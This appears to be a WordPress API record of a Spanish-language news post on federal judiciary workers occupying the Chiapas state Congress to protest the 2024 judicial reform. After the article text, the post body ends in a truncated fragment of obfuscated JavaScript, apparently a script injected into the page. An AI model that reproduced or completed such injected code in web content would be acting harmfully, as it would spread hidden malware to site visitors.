{"id":17799,"date":"2024-09-11T02:06:20","date_gmt":"2024-09-11T02:06:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17799"},"modified":"2024-09-11T02:06:22","modified_gmt":"2024-09-11T02:06:22","slug":"trabajadores-del-pjf-toman-congreso-del-estado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17799","title":{"rendered":"Trabajadores del PJF toman Congreso del Estado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726020281147-1024x768.jpg\" alt=\"\" class=\"wp-image-17800\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726020281147-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726020281147-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726020281147-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1726020281147.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Miguel de La Rosa.<\/p>\n\n\n\n<p>10 de septiembre del 2024. Tuxtla Guti\u00e9rrez.- Trabajadores del Poder Judicial Federal de Tuxtla Guti\u00e9rrez, salieron a las calles y tomaron el Congreso del Estado, para se\u00f1alar que, la propuesta de Reforma se trata de un retroceso para el pa\u00eds.<\/p>\n\n\n\n<p>De acuerdo con Ram\u00f3n Arias Montes adscrito al Juzgado Sexto de Distrito de Amparo y Juicios Federales en el estado de Chiapas, consider\u00f3 que, ante esta posibilidad de aprobaci\u00f3n hacen un llamado a los legisladores para pensar en el bien del pa\u00eds.<\/p>\n\n\n\n<p>\u201cLa propuesta es porque existe la posibilidad de que en el Senado de la Rep\u00fablica se apruebe la propuesta y el dictamen que ya fue aprobado por las comisiones, lo que significar\u00eda que la pasa a cada uno de los Congresos estatales, para su respectiva aprobaci\u00f3n o desaprobaci\u00f3n\u201d, precis\u00f3.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que, esta propuesta est\u00e1 sustentada en mentiras, fuera de la realidad, haciendo creer al pueblo de M\u00e9xico que son los ministerios p\u00fablicos, las polic\u00edas de investigaci\u00f3n.<\/p>\n\n\n\n<p>\u201cLa realidad es que existe una falta de cultura judicial, la gente cree que estamos a cargo de las justicias locales, en realidad lo que nosotros resolvemos son juicios de amparo en donde defiende la supremac\u00eda constitucional, en casos en lo que los actos de autoridad violan derechos humanos\u201d, precis\u00f3.<\/p>\n\n\n\n<p>\u201cEs una mentira el hecho de intentar hacer creer que el nivel de nepotismo en el PJF es muy elevado, este es un problema arraigado en todas las instituciones p\u00fablicas del pa\u00eds\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Calific\u00f3 como una distorsi\u00f3n de la realidad, porque se atribuyen esa pr\u00e1cticas a todas las relaciones familiares dentro de la instituci\u00f3n; sin embargo hay quienes han ingresado por medio de concursos de oposici\u00f3n y si bien es cierto, ellos tambi\u00e9n ingresaron por propios m\u00e9ritos y propios esfuerzos.<\/p>\n\n\n\n<p>\u201cQuienes m\u00e1s nepotismo practican, pues en el gobierno de la Rep\u00fablica tambi\u00e9n son descaradas, como es el caso de la actual gobernadora de Guerrero, lo es, solo porque apellida Salgado, en tanto que la candidata a la alcald\u00eda Cuauht\u00e9moc en la Ciudad de M\u00e9xico, solo lo fue porque apellida Monreal, y la \u00faltima ministra designada es de apellido Batres\u201d, coment\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Miguel de La Rosa. 10 de septiembre del 2024. Tuxtla Guti\u00e9rrez.- Trabajadores del Poder Judicial Federal de Tuxtla Guti\u00e9rrez, salieron a las calles y tomaron el Congreso del Estado, para se\u00f1alar que, la propuesta de Reforma se trata de un retroceso para el pa\u00eds. De acuerdo con Ram\u00f3n Arias Montes adscrito al Juzgado Sexto de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17800,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17799","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17799","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17799"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17799\/revisions"}],"predecessor-version":[{"id":17801,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17799\/revisions\/17801"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17800"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17799"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17799"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17799"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}